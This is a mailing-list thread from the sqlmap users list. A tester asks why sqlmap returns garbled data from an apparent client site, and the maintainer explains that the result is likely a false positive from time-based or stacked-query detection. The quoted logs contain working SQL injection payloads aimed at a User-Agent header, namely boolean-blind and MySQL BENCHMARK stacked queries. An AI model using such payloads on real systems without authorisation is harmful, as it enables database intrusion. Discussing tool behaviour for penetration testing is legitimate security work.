Hi Chris.
I am pretty sure that this was a false positive :)
First thing is that you've stumbled upon a rare beast of MySQL stacked :).
That was a first hint that something could be wrong.
Another thing is that in every case where you have a time or stacked based
injection we have a false positive test, but there is a slight chance that
false positive falls through it (really small). Now, if you see those
random garbage in those cases you have to KNOW that you've stumbled upon a
false positive.
Please, to make sure, just use --flush-session --time-sec=10 (or some other
value greater than default 5). You'll probably see that there won't be any
positives in that case.
Kind regards,
Miroslav Stampar
On Sat, Jun 2, 2012 at 9:11 PM, Chris Rowe <pipedreamreal...@gmail.com>wrote:
> I am doing a test right now and I am receiving unusual output during data
> retrieval. I have never seen this from sqlmap before. I have tried using
> single or multi threads, --no-cast, and --hex options with no luck. I am
> using sqlmap 1.0-dev r5100. Could the data in the database be a different
> language that sqlmap can't read? The clinet's site is primarily in
> arabic. I need help!! Thanks
> *
> Here is the output from the log file:*
>
> Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND 6574=6574--
>
> Type: stacked queries
> Title: MySQL < 5.0.12 stacked queries (heavy query)
> Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
> BENCHMARK(10000000,MD5(0x504b774c));--
> ---
>
> current user: None
>
> current database: None
>
> current user is DBA: None
>
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: User-Agent
> Parameter: User-Agent
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause (Generic
> comment)
> Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND
> 6574=6574--
>
> Type: stacked queries
> Title: MySQL < 5.0.12 stacked queries (heavy query)
> Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
> BENCHMARK(10000000,MD5(0x504b774c));--
> ---
>
> current user: 'x?'
>
> current database: None
>
> current user is DBA: None
>
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: User-Agent
> Parameter: User-Agent
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause (Generic
> comment)
> Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND
> 6574=6574--
>
> Type: stacked queries
> Title: MySQL < 5.0.12 stacked queries (heavy query)
> Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
> BENCHMARK(10000000,MD5(0x504b774c));--
> ---
>
> current user: 'x?'
>
> current database: '??n x^}h'
>
> current user is DBA: None
>
>
> *Here is the command line output during testing:*
>
> [13:37:28] [INFO] changes made by tampering scripts are not included in
> shown payload content(s)
> [13:37:28] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows Vista
> web application technology: Apache, ASP.NET 4.0.30319, ASP.NET, Microsoft
> IIS 7.0
>
> back-end DBMS: MySQL 5
> [13:37:28] [INFO] fetching current user
> [13:37:28] [INFO] retrieving the length of query output
> [13:37:28] [INFO] retrieved:
> [13:37:32] [INFO] resumed: x?
> current user: 'x?'
>
> [13:37:32] [INFO] fetching current database
> [13:37:32] [INFO] retrieving the length of query output
> [13:37:32] [INFO] retrieved: 8
> [13:38:32] [INFO] retrieved: ??n x^}h
> current database: '??n x^}h'
>
> [13:38:32] [INFO] testing if current user is DBA
> [13:38:32] [INFO] fetching current user
> [13:38:32] [INFO] retrieving the length of query output
> [13:38:32] [INFO] retrieved: 6
> [13:38:58] [WARNING] there was a problem decoding value '??????' from
> expected hexadecimal form
>
> current user is DBA: None
>
> [13:38:58] [INFO] fetching database users
> [13:38:58] [INFO] fetching number of database users
> [13:38:58] [INFO] retrieved: 48
> [13:39:08] [CRITICAL] unable to retrieve the number of database users
> [13:39:08] [WARNING] HTTP error codes detected during testing:
> 500 (Internal Server Error) - 23 times
>
> [*] shutting down at 13:39:08
>
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
